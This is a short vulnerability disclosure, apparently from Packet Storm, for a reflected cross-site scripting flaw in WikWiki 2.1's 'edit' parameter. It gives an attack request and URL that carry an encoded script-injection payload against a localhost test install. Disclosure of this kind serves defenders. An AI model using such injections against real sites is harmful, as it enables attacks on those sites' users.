WikWiki version 2.1 suffers from a cross site scripting vulnerability.
e5e3d64c6c3e5347c0e6e3ef02dac0d6a5539c8bc5e33440dfd9c6a1c89cad45# Exploit Title: WikWiki - Reflected XSS
# Date: 2016-08-01
# Exploit Author: HaHwul
# Vendor Homepage: https://github.com/smasty/WikWiki
# Software Link: https://github.com/smasty/WikWiki/archive/master.zip
# Version: v2.1
# Tested on: Debian[Whezzy]
# CVE : none
### Vulnerability Point
Edit page is not filtered special char.
Inject html code on root directory and edit parameter.
### Attack Request
GET /?edit=55596317%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E94fd7 HTTP/1.1
Host: 127.0.0.1
...snip..
### Attack URL
http://127.0.0.1/vul_test/WikWiki/?edit=55596317%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E94fd7
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed